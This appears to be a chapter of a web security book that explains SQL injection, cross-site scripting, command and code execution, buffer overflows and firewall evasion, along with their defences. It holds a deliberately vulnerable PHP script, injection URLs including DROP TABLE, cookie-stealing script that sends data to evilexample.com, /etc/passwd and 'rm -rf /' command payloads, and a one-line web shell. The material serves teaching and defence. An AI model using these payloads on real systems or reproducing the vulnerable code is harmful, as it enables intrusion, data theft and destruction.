CREATE DATABASE sql_injection_test; USE sql_injection_test; CREATE TABLE customers ( customerid INTEGER NOT NULL, username CHAR(32) NOT NULL, password CHAR(32) NOT NULL, PRIMARY KEY(customerid) ); INSERT INTO customers ( customerid, username, password ) VALUES ( 1, 'ivanr', 'secret' ); INSERT INTO customers ( customerid, username, password ) VALUES ( 2, 'jelena', 'alsosecret' ); CREATE TABLE accounts ( accountid INTEGER NOT NULL, customerid INTEGER NOT NULL, balance DECIMAL(9, 2) NOT NULL, PRIMARY KEY(accountid) ); INSERT INTO accounts ( accountid, customerid, balance ) VALUES ( 1, 1, 1000.00 ); INSERT INTO accounts ( accountid, customerid, balance ) VALUES ( 2, 2, 2500.00 );
Create a PHP file named view_customer.php
with the
following code inside, and set the values of the variables at the top of the
file as appropriate to enable the script to establish a connection to your
database:
<? $dbhost = "localhost"; $dbname = "sql_injection_test"; $dbuser = "root"; $dbpass = ""; // connect to the database engine if (!mysql_connect($dbhost, $dbuser, $dbpass)) { die("Could not connect: " . mysql_error()); } // select the database if (!mysql_select_db($dbname)) { die("Failed to select database $dbname:" . mysql_error()); } // construct and execute query $query = "SELECT username FROM customers WHERE customerid = " . $_REQUEST["customerid"]; $result = mysql_query($query); if (!$result) { die("Failed to execute query [$query]: " . mysql_error()); } // show the result while ($row = mysql_fetch_assoc($result)) { echo "USERNAME = " . $row["username"] . "<br>"; } // close the connection mysql_close(); ?>
This script might be written by a programmer who does not know about SQL
injection attacks. The script is designed to accept the customer ID as its only
parameter (named customerid
). Suppose you request a page
using the following URL:
http://www.example.com/view_customer.php?customerid=1
The PHP script will retrieve the username of the customer (in this case,
ivanr
) and display it on the screen. All seems well, but
what we have in the query in the PHP file is the worst-case SQL injection
scenario. The customer ID supplied in a parameter becomes a part of the SQL
query in a process of string concatenation. No checking is done to verify that
the parameter is in the correct format. Using simple URL manipulation, the
attacker can inject SQL commands directly into the database query, as in the
following example:
http://www.example.com/view_customer.php?customerid=1%20OR%20customerid%3D2
If you specify the URL above, you will get two usernames displayed on the
screen instead of a single one, which is what the programmer intended for the
program to supply. Notice how we have URL-encoded some characters to put them
into the URL, specifying %20
for the space character and
%3D
for an equals sign. These characters have special
meanings when they are a part of a URL, so we had to hide them to make the URL
work. After the URL is decoded and the specified customerid
sent to the PHP program, this is what the query looks like (with the
user-supplied data emphasized for clarity):
SELECT username FROM customers WHERE customerid = 1 OR customerid=2
This type of SQL injection is the worst-case scenario because the input data
is expected to be an integer, and in that case many programmers neglect to
validate the incoming value. Integers can go into an SQL query directly because
they cannot cause a query to fail. This is because integers consist only of
numbers, and numbers do not have a special meaning in SQL. Strings, unlike
integers, can contain special characters (such as single quotation marks) so
they have to be converted into a representation that will not confuse the
database engine. This process is called escaping and is
usually performed by preceding each special character with a backslash
character. Imagine a query that retrieves the customer ID based on the
username
. The code might look like this:
$query = "SELECT customerid FROM customers WHERE username = '" . $_REQUEST["username"] . "'";
You can see that the data we supply goes into the query, surrounded by single quotation marks. That is, if your request looks like this:
http://www.example.com/view_customer.php?username=ivanr
The query becomes:
SELECT customerid FROM customers WHERE username = 'ivanr'
Appending malicious data to the page parameter as we did before will do little damage because whatever is surrounded by quotes will be treated by the database as a string and not a query. To change the query an attacker must terminate the string using a single quote, and only then continue with the query. Assuming the previous query construction, the following URL would perform an SQL injection:
http://www.example.com/view_customer.php?username=ivanr'%20OR %20username%3D'jelena'--%20
By adding a single quote to the username
parameter, we
terminated the string and entered the query space. However, to make the query
work, we added an SQL comment start (--
) at the end,
neutralizing the single quote appended at the end of the query in the code. The
query becomes:
SELECT customerid FROM customers WHERE username = 'ivanr' OR username='jelena'-- '
The query returns two customer IDs, rather than the one intended by the
programmer. This type of attack is actually often more difficult to do than the
attack in which single quotes were not used because some environments (PHP, for
example) can be configured to automatically escape single quotes that appear in
the input URL. That is, they may change a single quote (’) that appears in the
input to \
’, in which the backslash indicates that the single
quote following it should be interpreted as the single quote character, not as a
quote delimiting a string. Even programmers who are not very security-conscious
will often escape single quotes because not doing so can lead to errors when an
attempt is made to enter a name such as O'Connor
into the
application.
Though the examples so far included only the SELECT
construct, INSERT
and DELETE
statements
are equally vulnerable. The only way to avoid SQL injection problems is to avoid
using simple string concatenation as a way to construct queries. A better (and
safe) approach, is to use prepared statements. In this
approach, a query template is given to the database, followed by the separate
user data. The database will then construct the final query, ensuring no
injection can take place.
We have seen how SQL injection can be used to access data from a single table.
If the database system supports the UNION
construct (which
MySQL does as of Version 4), the same concept can be used to fetch data from
multiple tables. With UNION
, you can append a new query to
fetch data and add it to the result set. Suppose the parameter
customerid
from the previous example is set as
follows:
http://www.example.com/view_customer.php?customerid=1%20UNION%20ALL %20SELECT%20balance%20FROM%20accounts%20WHERE%20customerid%3D2
the query becomes:
SELECT username FROM customers WHERE customerid = 1 UNION ALL SELECT balance FROM accounts WHERE customerid=2
The original query fetches a username
from the
customers
table. With UNION
appended,
the modified query fetches the username
but it also retrieves
an account balance from the accounts
table.
Things become really ugly if the database system supports multiple statements in a single query. Though our attacks so far were a success, there were still two limitations:
We had to append our query fragment to an existing query, which limited what we could do with the query.
We were limited to the type of the query used by the programmer. A
SELECT
query could not turn into
DELETE
or DROP TABLE
.
With multiple statements possible, we are free to submit a custom-crafted query to perform any action on the database (limited only by the permissions of the user connecting to the database).
When allowed, statements are separated by a semicolon. Going back to our first example, here is the URL to remove all customer information from the database:
http://www.example.com/view_customer.php?customerid=1;DROP%20 TABLE%20customers
After SQL injection takes place, the second SQL query to be executed will be
DROP
TABLE customers
.
Exploiting SQL injection flaws can be hard work because there are many database engines, and each engine supports different features and a slightly different syntax for SQL queries. The attacker usually works to identify the type of database and then proceeds to research its functionality in an attempt to use some of it.
Databases have special features that make life difficult for those who need to protect them:
You can usually enumerate the tables in the database and the fields in a table. You can retrieve values of various database parameters, some of which may contain valuable information. The exact syntax depends on the database in place.
Microsoft SQL server ships with over 1,000 built-in stored procedures. Some do fancy stuff such as executing operating system code, writing query output into a file, or performing full database backup over the Internet (to the place of the attacker’s choice, of course). Stored procedures are the first feature attackers will go for if they discover an SQL injection vulnerability in a Microsoft SQL server.
Many databases can read and write files, usually to perform data
import and export. These features can be exploited to output the
contents of the database, where it can be accessed by an attacker. (This
MySQL feature was instrumental in compromising Apache Foundation’s own
web site, as described at http://www.dataloss.net/papers/how.defaced.apache.org.txt
.)
We have only exposed the tip of the iceberg with our description of SQL injection flaws. Being the most popular flaw, they have been heavily researched. You will find the following papers useful to learn more about such flaws.
“SQL Injection” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
)
“Advanced SQL Injection in SQL Server Applications” by Chris Anley
(NGS) (http://www.nextgenss.com/papers/advanced_sql_injection.pdf
)
“(more) Advanced SQL Injection” by Chris Anley (NGS) (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf
)
“Hackproofing MySQL” by Chris Anley (NGS) (http://www.nextgenss.com/papers/HackproofingMySQL.pdf
)
“Blind SQL Injection” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
)
“LDAP Injection” by Sacha Faust (SPI Dynamics) (http://www.spidynamics.com/whitepapers/LDAPinjection.pdf
)
“Blind XPath Injection” by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/WhitePaper_Blind_XPath_Injection.pdf
)
Unlike other injection flaws, which occur when the programmer fails to sanitize data on input, cross-site scripting (XSS) attacks occur on the output. If the attack is successful, the attacker will control the HTML source code, emitting HTML markup and JavaScript code at will.
This attack occurs when data sent to a script in a parameter appears in the response. One way to exploit this vulnerability is to make a user click on what he thinks is an innocent link. The link then takes the user to a vulnerable page, but the parameters will spice the page content with malicious payload. As a result, malicious code will be executed in the security context of the browser.
Suppose a script contains an insecure PHP code fragment such as the following:
<? echo $_REQUEST["param"] ?>
It can be attacked with a URL similar to this one:
http://www.example.com/xss.php?param=<script>alert(document.location)</script>
The final page will contain the JavaScript code given to the script as a
parameter. Opening such a page will result in a JavaScript pop-up box appearing on
the screen (in this case displaying the contents of the
document.location
variable) though that is not what the
original page author intended. This is a proof of concept you can use to test if a
script is vulnerable to cross-site scripting attacks.
Email clients that support HTML and sites where users encounter content written by other users (often open communities such as message boards or web mail systems) are the most likely places for XSS attacks to occur. However, any web-based application is a potential target. My favorite example is the registration process most web sites require. If the registration form is vulnerable, the attack data will probably be permanently stored somewhere, most likely in the database. Whenever a request is made to see the attacker’s registration details (newly created user accounts may need to be approved manually for example), the attack data presented in a page will perform an attack. In effect, one carefully placed request can result in attacks being performed against many users over time.
XSS attacks can have some of the following consequences:
If attackers can control the HTML markup, they can make the page look any way they want. Since URLs are limited in size, they cannot be used directly to inject a lot of content. But there is enough space to inject a frame into the page and to point the frame to a server controlled by an attacker. A large injected frame can cover the content that would normally appear on the page (or push it outside the visible browser area). When a successful deception attack takes place, the user will see a trusted location in the location bar and read the content supplied by the attacker (a handy way of publishing false news on the Internet). This may lead to a successful phishing attack.
If an XSS attack is performed against a web site where users keep confidential information, a piece of JavaScript code can gain access to the displayed pages and forms and can collect the data and send it to a remote (evil) server.
Sometimes a user’s browser can go places the attacker’s browser cannot. This is often the case when the user is accessing a password-protected web site or accessing a web site where access is restricted based on an IP address.
This is an extension from the previous point. Not only can the attacker access privileged information, but he can also perform requests without the user knowing. This can prove to be difficult in the case of an internal and well-guarded application, but a determined attacker can pull it off. This type of attack is a variation on XSS and is sometimes referred to as cross-site request forgery (CSRF). It’s a dangerous type of attack because, unlike XSS where the attacker must interact with the original application directly, CSRF attacks are carried out from the user’s IP address and the attacker becomes untraceable.
Though most attention is given to XSS attacks that contain JavaScript code, XSS can be used to invoke other dangerous elements, such as Flash or Java programs or even ActiveX objects. Successful activation of an ActiveX object, for example, would allow the attacker to take full control over the workstation.
If the browser is not maintained and regularly patched, it may be possible for malicious code to compromise it. An unpatched browser is a flaw of its own, the XSS attack only helps to achieve the compromise.
The most dangerous consequence of an XSS attack is having a session token stolen. (Session management mechanics were discussed earlier in this chapter.) A person with a stolen session token has as much power as the user the token belongs to. Imagine an e-commerce system that works with two classes of users: buyers and administrators. Anyone can be a buyer (the more the better) but only company employees can work as administrators. A cunning criminal may register with the site as a buyer and smuggle a fragment of JavaScript code in the registration details (in the name field, for example). Sooner or later (the attacker may place a small order to speed things up, especially if it is a smaller shop) one of the administrators will access her registration details, and the session token will be transmitted to the attacker. Notified about the token, the attacker will effortlessly log into the application as the administrator. If written well, the malicious code will be difficult to detect. It will probably be reused many times as the attacker explores the administration module.
In our first XSS example, we displayed the contents of the
document.location
variable in a dialog box. The value of the
cookie is stored in document.cookie
. To steal a cookie, you must
be able to send the value somewhere else. An attacker can do that with the following
code:
<script>document.write('<img src=http://www.evilexample.com/' + document.cookie>)</script>
If embedding of the JavaScript code proves to be too difficult because single quotes and double quotes are escaped, the attacker can always invoke the script remotely:
<script src=http://www.evilexample.com/script.js></script>
Though these examples show how a session token is stolen when it is stored in a cookie, nothing in cookies makes them inherently insecure. All session token transport mechanisms are equally vulnerable to session hijacking via XSS.
XSS attacks can be difficult to detect because most action takes place at the
browser, and there are no traces at the server. Usually, only the initial attack can
be found in server logs. If one can perform an XSS attack using a
POST
request, then nothing will be recorded in most cases,
since few deployments record POST
request bodies.
One way of mitigating XSS attacks is to turn off browser scripting capabilities. However, this may prove to be difficult for typical web applications because most rely heavily on client-side JavaScript. Internet Explorer supports a proprietary extension to the Cookie standard, called HttpOnly, which allows developers to mark cookies used for session management only. Such cookies cannot be accessed from JavaScript later. This enhancement, though not a complete solution, is an example of a small change that can result in large benefits. Unfortunately, only Internet Explorer supports this feature.
XSS attacks can be prevented by designing applications to properly validate input data and escape all output. Users should never be allowed to submit HTML markup to the application. But if you have to allow it, do not rely on simple text replacement operations and regular expressions to sanitize input. Instead, use a proper HTML parser to deconstruct input data, and then extract from it only the parts you know are safe.
“The Cross Site Scripting FAQ” by Robert Auger (http://www.cgisecurity.com/articles/xss-faq.txt
)
“Advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web
Requests“ by CERT Coordination Center (http://www.cert.org/advisories/CA-2000-02.html
)
“Understanding Malicious Content Mitigation for Web developers“ by
CERT Coordination Center (http://www.cert.org/tech_tips/malicious_code_mitigation.html
)
“Cross-Site Scripting” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/SPIcross-sitescripting.pdf
)
“Cross-Site Tracing (XST)” by Jeremiah Grossman (WhiteHat Security)
(http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf
)
“Second-order Code Injection Attacks” by Gunter Ollmann (NGS)
(http://www.nextgenss.com/papers/SecondOrderCodeInjection.pdf
)
“Divide and Conquer, HTTP Response Splitting, Web Cache Poisoning
Attacks, and Related Topics“ by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf
)
Command execution attacks take place when the attacker succeeds in manipulating script parameters to execute arbitrary system commands. These problems occur when scripts execute external commands using input parameters to construct the command lines but fail to sanitize the input data.
Command executions are frequently found in Perl and PHP programs. These programming environments encourage programmers to reuse operating system binaries. For example, executing an operating system command in Perl (and PHP) is as easy as surrounding the command with backtick operators. Look at this sample PHP code:
$output = `ls -al /home/$username`; echo $output;
This code is meant to display a list of files in a folder. If a semicolon is used in the input, it will mark the end of the first command, and the beginning of the second. The second command can be anything you want. The invocation:
http://www.example.com/view_user.php?username=ivanr;cat%20/etc/passwd
It will display the contents of the passwd
file on the
server.
Once the attacker compromises the server this way, he will have many opportunities to take advantage of it:
Execute any binary on the server (use your imagination)
Start a Telnet server and log into the server with privileges of the web server user
Download other binaries from public servers
Download and compile tool source code
Perform exploits to gain root access
The most commonly used attack vector for command execution is mail sending in
form-to-email scripts. These scripts are typically written in Perl. They are written
to accept data from a POST
request, construct the email message,
and use sendmail
to send it. A vulnerable code segment in Perl
could look like this:
# send email to the user open(MAIL, "|/usr/lib/sendmail $email"); print MAIL "Thank you for contacting us.\n"; close MAIL;
This code never checks whether the parameter $email
contains
only the email address. Since the value of the parameter is used directly on the
command line an attacker could terminate the email address using a semicolon, and
execute any other command on the system.
http://www.example.com/feedback.php?email=ivanr@webkreator.com;rm%20-rf%20/
Code execution is a variation of command execution. It refers to execution of the
code (script) that runs in the web server rather than direct execution of operating
system commands. The end result is the same because attackers will only use code
execution to gain command execution, but the attack vector is different. If the
attacker can upload a code fragment to the server (using FTP or file upload features
of the application) and the vulnerable application contains an include(
)
statement that can be manipulated, the statement can be used to
execute the uploaded code. A vulnerable include()
statement is
usually similar to this:
include($_REQUEST["module"] . "/index.php");
Here is an example URL with which it can be used:
http://www.example.com/index.php?module=news
In this particular example, for the attack to work the attacker must be able to
create a file called index.php
anywhere on the server and then
place the full path to it in the module
parameter of the
vulnerable script.
As discussed in Chapter 3, the
allow_url_fopen
feature of PHP is extremely dangerous and
enabled by default. When it is used, any file operation in PHP will accept and use a
URL as a filename. When used in combination with include()
, PHP
will download and execute a script from a remote server (!):
http://www.example.com/index.php?module=http://www.evilexample.com
Another feature, register_globals
, can contribute to
exploitation. Fortunately, this feature is disabled by default in recent PHP
versions. I strongly advise you to keep it disabled. Even when the script is not
using input data in the include()
statement, it may use the value
of some other variable to construct the path:
include($TEMPLATES . "/template.php");
With register_globals
enabled, the attacker can possibly
override the value of the $TEMPLATES
variable, with the end
result being the same:
http://www.example.com/index.php?TEMPLATES=http://www.evilexample.com
It’s even worse if the PHP code only uses a request parameter to locate the file, like in the following example:
include($parameter);
When the register_globals
option is enabled in a request that
is of multipart/form-data
type (the type of the request is
determined by the attacker so he can choose to have the one that suits him best),
PHP will store the uploaded file somewhere on disk and put the full path to the
temporary file into the variable $parameter
. The attacker can
upload the malicious script and execute it in one go. PHP will even delete the
temporary file at the end of request processing and help the attacker hide his
tracks!
Sometimes some other problems can lead to code execution on the server if someone
manages to upload a PHP script through the FTP server and get it to execute in the
web server. (See the www.apache.org
compromise mentioned near the
end of the “SQL Injection” section for an example.)
A frequent error is to allow content management applications to upload files (images) under the web server tree but forget to disable script execution in the folder. If someone hijacks the content management application and uploads a script instead of an image he will be able to execute anything on the server. He will often only upload a one-line script similar to this one:
<? passthru($cmd) ?>
Try it out for yourself and see how easy it can be.
Injection attacks can be prevented if proper thought is given to the problem in
the software design phase. These attacks can occur anywhere where characters with a
special meaning, metacharacters, are mixed with data. There are
many types of metacharacters. Each system component can use different metacharacters
for different purposes. In HTML, for example, special characters are
&
, <
, >
, “,
and ’. Problems only arise if the programmer does not take steps to handle
metacharacters properly.
To prevent injection attacks, a programmer needs to perform four steps:
Identify system components
Identify metacharacters for each component
Validate data on input of every component (e.g., to ensure a variable contains an email address, if it should)
Transform data on input of every component to neutralize metacharacters
(e.g., to neutralize the ampersand character (&
) that
appears in user data and needs to be a part of an HTML page, it must be
converted to &
)
Data validation and transformation should be automated wherever possible. For example, if transformation is performed in each script then each script is a potential weak point. But if scripts use an intermediate library to retrieve user input and the library contains functionality to handle data validation and transformation, then you only need to make sure the library works as expected. This principle can be extended to cover all data manipulation: never handle data directly, always use a library.
The metacharacter problem can be avoided if control information is transported independently from data. In such cases, special characters that occur in data lose all their powers, transformation is unnecessary and injection attacks cannot succeed. The use of prepared statements to interact with a database is one example of control information and data separation.
Buffer overflow occurs when an attempt is made to use a limited-length buffer to store a larger piece of data. Because of the lack of boundary checking, some amount of data will be written to memory locations immediately following the buffer. When an attacker manipulates program input, supplying specially crafted data payload, buffer overflows can be used to gain control of the application.
Buffer overflows affect C-based languages. Since most web applications are scripted (or written in Java, which is not vulnerable to buffer overflows), they are seldom affected by buffer overflows. Still, a typical web deployment can contain many components written in C:
Web servers, such as Apache
Custom Apache modules
Application engines, such as PHP
Custom PHP modules
CGI scripts written in C
External systems
Note that external systems such as databases, mail servers, directory servers and other servers are also often programmed in C. That the application itself is scripted is irrelevant. If data crosses system boundaries to reach the external system, an attacker could exploit a vulnerability.
A detailed explanation of how buffer overflows work falls outside the scope of this book. Consult the following resources to learn more:
The Shellcoder’s Handbook: Discovering and Exploiting Security Holes by Jack Koziol et al. (Wiley)
“Practical Code Auditing” by Lurene A. Grenier (http://www.daemonkitty.net/lurene/papers/Audit.pdf
)
“Buffer Overflows Demystified” by Murat Balaban (http://www.enderunix.org/docs/eng/bof-eng.txt
)
“Smashing The Stack For Fun And Profit” by Aleph One (http://www.insecure.org/stf/smashstack.txt
)
“Advanced Doug Lea’s malloc exploits” by jp@corest.com (http://www.phrack.org/phrack/61/p61-0x06_Advanced_malloc_exploits.txt
)
“Taking advantage of nonterminated adjacent memory spaces” by twitch@vicar.org
(http://www.phrack.org/phrack/56/p56-0x0e
)
Intrusion detection systems (IDSs) are an integral part of web application security. In Chapter 9, I introduced web application firewalls (also covered in Chapter 12), whose purpose is to detect and reject malicious requests.
Most web application firewalls are signature-based. This means they monitor HTTP traffic looking for signature matches, where this type of “signature” is a pattern that suggests an attack. When a request is matched against a signature, an action is taken (as specified by the configuration). But if an attacker modifies the attack payload in some way to have the same meaning for the target but not to resemble a signature the web application firewall is looking for, the request will go through. Techniques of attack payload modification to avoid detection are called evasion techniques.
Evasion techniques are a well-known tool in the TCP/IP-world, having been used against network-level IDS tools for years. In the web security world, evasion is somewhat new. Here are some papers on the subject:
“A look at whisker’s anti-IDS tactics” by Rain Forest Puppy (http://www.apachesecurity.net/archive/whiskerids.html
)
“IDS Evasion Techniques and Tactics” by Kevin Timm (http://www.securityfocus.com/printable/infocus/1577
)
We start with the simple yet effective evasion techniques:
This technique can be useful for attackers when attacking platforms
(e.g., Windows) where filenames are not case sensitive; otherwise, it is
useless. Its usefulness rises, however, if the target Apache includes
mod_speling
as one of its modules. This module
tries to find a matching file on disk, ignoring case and allowing up to
one spelling mistake.
Sometimes people do not realize you can escape any character by
preceding the character with a backslash character
(\
), and if the character does not have a special
meaning, the escaped character will convert into itself. Thus,
\d
converts to d
. It is not
much but it is enough to fool an IDS. For example, an IDS looking for
the pattern id
would not detect a string
i\d
, which has essentially the same
meaning.
Using excessive whitespace, especially the less frequently thought of
characters such as TAB and new line, can be an evasion technique. For
example, if an attacker creates an SQL injection attempt using
DELETE FROM
(with two spaces in between the words
instead of one), the attack will be undetected by an IDS looking for
DELETE FROM
(with just one space in
between).
Many evasion techniques are used in attacks against the filesystem. For example, many methods can obfuscate paths to make them less detectable:
When a ./
combination is used in a path, it does
not change the meaning but it breaks the sequence of characters in two.
For example, /etc/passwd
may be obfuscated to the
equivalent /etc/./passwd
.
Using double slashes is one of the oldest evasion techniques. For
example, /etc/passwd
may be written as
/etc//passwd
.
Path traversal occurs when a backreference is used to back out of the
current folder, but the name of the folder is used again to advance. For
example, /etc/passwd
may be written as
/etc/dummy/../passwd
, and both versions are
legal. This evasion technique can be used against application code that
performs a file download to make it disclose an arbitrary file on the
filesystem. Another use of the attack is to evade an IDS system looking
for well-known patterns in the traffic (/etc/passwd
is one example).
When the web server is running on Windows, the Windows-specific folder
separator \
can be used. For example,
../../cmd.exe
may be written as
..\..\cmd.exe
.
Internal Field Separator (IFS) is a feature of some UNIX shells
(sh
and bash
, for example)
that allows the user to change the field separator (normally, a
whitespace character) to something else. After you execute an
IFS=X
command on the shell command line, you can
type CMD=X/bin/catX/etc/passwd;eval$CMD
to
display the contents of the /etc/passwd
file on
screen.
Some characters have a special meaning in URLs, and they have to be encoded if
they are going to be sent to an application rather than interpreted according to
their special meanings. This is what URL encoding is for. (See RFC 1738 at
http://www.ietf.org/rfc/rfc1738.txt
and RFC
2396 at http://www.ietf.org/rfc/rfc2396.txt
.) I
showed URL encoding several times in this chapter, and it is an essential technique
for most web application attacks.
It can also be used as an evasion technique against some network-level IDS systems. URL encoding is mandatory only for some characters but can be used for any. As it turns out, sending a string of URL-encoded characters may help an attack slip under the radar of some IDS tools. In reality, most tools have improved to handle this situation.
Sometimes, rarely, you may encounter an application that performs URL decoding twice. This is not correct behavior according to standards, but it does happen. In this case, an attacker could perform URL encoding twice.
The URL:
http://www.example.com/paynow.php?p=attack
becomes:
http://www.example.com/paynow.php?p=%61%74%74%61%63%6B
when encoded once (since %61
is an encoded a
character, %74
is an encoded t
character, and
so on), but:
http://www.example.com/paynow.php?p=%2561%2574%2574%2561%2563%256B
when encoded twice (where %25
represents a percent
sign).
If you have an IDS watching for the word “attack”, it will (rightly) decode the URL only once and fail to detect the word. But the word will reach the application that decodes the data twice.
There is another way to exploit badly written decoding schemes. As you know, a
character is URL-encoded when it is represented with a percentage sign, followed by
two hexadecimal digits (0
-F
, representing the
values 0
-15
). However, some decoding functions
never check to see if the two characters following the percentage sign are valid
hexadecimal digits. Here is what a C function for handling the two digits might look
like:
unsigned char x2c(unsigned char *what) { unsigned char c0 = toupper(what[0]); unsigned char c1 = toupper(what[1]); unsigned char digit; digit = ( c0 >= 'A' ? c0 - 'A' + 10 : c0 - '0' ); digit = digit * 16; digit = digit + ( c1 >= 'A' ? c1 - 'A' + 10 : c1 - '0' ); return digit; }
This code does not do any validation. It will correctly decode valid URL-encoded
characters, but what happens when an invalid combination is supplied? By using
higher characters than normally allowed, we could smuggle a slash character, for
example, without an IDS noticing. To do so, we would specify XV
for the characters since the above algorithm would convert those characters to the
ASCII character code for a slash.
The URL:
http://www.example.com/paynow.php?p=/etc/passwd
would therefore be represented by:
http://www.example.com/paynow.php?p=%XVetc%XVpasswd
Unicode attacks can be effective against applications that understand it. Unicode
is the international standard whose goal is to represent every character needed by
every written human language as a single integer number (see http://en.wikipedia.org/wiki/Unicode
). What is known as Unicode
evasion should more correctly be referenced as UTF-8 evasion. Unicode characters are
normally represented with two bytes, but this is impractical in real life. First,
there are large amounts of legacy documents that need to be handled. Second, in many
cases only a small number of Unicode characters are needed in a document, so using
two bytes per character would be wasteful.
Internet Information Server (IIS) supports a special (nonstandard) way of representing Unicode characters, designed to resemble URL encoding. If a letter “u” comes after the percentage sign, then the four bytes that follow are taken to represent a full Unicode character. This feature has been used in many attacks carried out against IIS servers. You will need to pay attention to this type of attack if you are maintaining an Apache-based reverse proxy to protect IIS servers.
UTF-8, a transformation format of ISO 10646 (http://www.ietf.org/rfc/rfc2279.txt
) allows most files to stay as
they are and still be Unicode compatible. Until a special byte sequence is
encountered, each byte represents a character from the Latin-1 character set. When a
special byte sequence is used, two or more (up to six) bytes can be combined to form
a single complex Unicode character.
One aspect of UTF-8 encoding causes problems: non-Unicode characters can be
represented encoded. What is worse is multiple representations of each character can
exist. Non-Unicode character encodings are known as overlong
characters, and may be signs of attempted attack. There are five ways
to represent an ASCII character. The five encodings below all decode to a new line
character (0x0A
):
0xc0 0x8A 0xe0 0x80 0x8A 0xf0 0x80 0x80 0x8A 0xf8 0x80 0x80 0x80 0x8A 0xfc 0x80 0x80 0x80 0x80 0x8A
Invalid UTF-8 encoding byte combinations are also possible, with similar results to invalid URL encoding.
Using URL-encoded null bytes is an evasion technique and an attack at the same time. This attack is effective against applications developed using C-based programming languages. Even with scripted applications, the application engine they were developed to work with is likely to be developed in C and possibly vulnerable to this attack. Even Java programs eventually use native file manipulation functions, making them vulnerable, too.
Internally, all C-based programming languages use the null byte for string termination. When a URL-encoded null byte is planted into a request, it often fools the receiving application, which happily decodes the encoding and plants the null byte into the string. The planted null byte will be treated as the end of the string during the program’s operation, and the part of the string that comes after it and before the real string terminator will practically vanish.
We looked at how a URL-encoded null byte can be used as an attack when we covered source code disclosure vulnerabilities in the “Source Code Disclosure” section. This vulnerability is rare in practice though Perl programs can be in danger of null-byte attacks, depending on how they are programmed.
Null-byte encoding is used as an evasion technique mainly against web application firewalls when they are in place. These systems are almost exclusively C-based (they have to be for performance reasons), making the null-byte evasion technique effective.
Web application firewalls trigger an error when a dangerous signature (pattern) is discovered. They may be configured not to forward the request to the web server, in which case the attack attempt will fail. However, if the signature is hidden after an encoded null byte, the firewall may not detect the signature, allowing the request through and making the attack possible.
To see how this is possible, we will look at a single POST
request, representing an attempt to exploit a vulnerable form-to-email script and
retrieve the passwd
file:
POST /update.php HTTP/1.0 Host: www.example.com Content-Type: application/x-form-urlencoded Content-Length: 78 firstname=Ivan&lastname=Ristic%00&email=ivanr@webkreator.com;cat%20/etc/passwd
A web application firewall configured to watch for the
/etc/passwd
string will normally easily prevent such an
attack. But notice how we have embedded a null byte at the end of the
lastname
parameter. If the firewall is vulnerable to this
type of evasion, it may miss our command execution attack, enabling us to continue
with compromise attempts.
Many SQL injection attacks use unique combinations of characters. An SQL comment
--%20
is a good example. Implementing an IDS protection based
on this information may make you believe you are safe. Unfortunately, SQL is too
versatile. There are many ways to subvert an SQL query, keep it valid, but sneak it
past an IDS. The first of the papers listed below explains how to write signatures
to detect SQL injection attacks, and the second explains how all that effort is
useless against a determined attacker:
“Detection of SQL Injection and Cross-site Scripting Attacks” by K. K.
Mookhey and Nilesh Burghate (http://www.securityfocus.com/infocus/1768
)
“SQL Injection Signatures Evasion” by Ofer Maor and Amichai Shulman
(http://www.imperva.com/application_defense_center/white_papers/sql_injection_signa-tures_evasion.html
)
“Determined attacker” is a recurring theme in this book. We are using imperfect techniques to protect web applications on the system administration level. They will protect in most but not all cases. The only proper way to deal with security problems is to fix vulnerable applications.
Web security is not easy because it requires knowledge of many different systems and technologies. The resources listed here are only a tip of the iceberg.
HTTP: The Definitive Guide by David Gourley and Brian Totty (O’Reilly)
RFC 2616, “Hypertext Transfer Protocol HTTP/1.1” (http://www.ietf.org/rfc/rfc2616.txt
)
HTML 4.01 Specification (http://www.w3.org/TR/html401/
)
JavaScript Central (http://devedge.netscape.com/central/javascript/
)
ECMAScript Language Specification (http://www.ecma-international.org/publica-tions/files/ecma-st/ECMA-262.pdf
)
ECMAScript Components Specification (http://www.ecma-international.org/pub-lications/files/ecma-st/ECMA-290.pdf
)
For anyone wanting to seriously explore web security, a fair knowledge of components (e.g., database systems) making up web applications is also necessary.
Web application security is a young discipline. Few books cover the subject in depth. Researchers everywhere, including individuals and company employees, regularly publish papers that show old problems in new light.
Hacking Exposed: Web Applications by Joel Scambray and Mike Shema (McGraw-Hill/Osborne)
Hack Notes: Web Security Portable Reference by Mike Shema (McGraw-Hill/Osborne)
Essential PHP Security by Chris Shiflett (O’Reilly)
Open Web Application Security Project (http://www.owasp.org
)
“Guide to Building Secure Web Applications” by OWASP (Open Web Application
Security Project) (http://www.owasp.org/documentation/guide.html
)
SecurityFocus Web Application Security Mailing List
(webappsec@securityfocus.com) (http://www.securityfocus.com/archive/107
)
WebGoat (http://www.owasp.org/software/webgoat.html
) (also
discussed in the Appendix A)
WebMaven (http://webmaven.mavensecurity.com/
) (also discussed in the
Appendix A)
SecurityFocus (http://www.securityfocus.com
)
CGISecurity (http://www.cgisecurity.com
)
Web Application Security Consortium (http://www.webappsec.org
)
Web Security Threat Classification (http://www.webappsec.org/threat.html
)
ModSecurity Resource Center (http://www.modsecurity.org/db/resources/
)
Web Security Blog (http://www.modsecurity.org/blog/
)
The World Wide Web Security FAQ (http://www.w3.org/Security/Faq/
)